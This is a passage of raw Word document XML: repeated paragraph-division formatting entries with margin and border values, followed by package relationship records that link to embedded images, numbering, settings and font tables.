        <w:div w:id="2032491468">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="893931502">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="11731399">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1112361815">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1664358641">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1408958546">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1284389155">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="324167426">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1552810855">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="45182627">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="445320143">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="489904224">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1929927345">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1438939496">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1175997220">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="902444353">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="238101220">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="254635555">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1387098363">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="66533992">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="921522948">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1591619456">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1568954825">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="482740551">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2014450211">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1277059860">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="295725684">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="274141339">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="617757470">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="414279026">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1993950368">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1441142215">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="246233436">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="374431318">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1055277905">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="159005532">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1089109915">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="2139715350">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1049450606">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="446509230">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="665522800">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1390375011">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="669329460">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1681661406">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1518959257">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1679651130">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1736049260">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1809938362">
          <w:marLeft w:val="640"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="970403880">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7.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image53.png"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image74.png"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image128.png"/><Relationship Id="rId159" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.jpg"/><Relationship Id="rId170" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image155.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image97.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image64.png"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image118.png"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image139.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image85.png"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image145.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image54.png"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image108.png"/><Relationship Id="rId139" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image129.png"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId150" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image98.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image119.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image65.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image86.jpeg"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image130.png"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.pn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3.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image104.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image109.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.png"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image55.png"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image71.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image76.png"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image125.png"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image141.png"/><Relationship Id="rId15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2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/glossaryDocument" Target="glossary/document.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109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9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png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image87.png"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image110.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image115.png"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image131.png"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image136.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 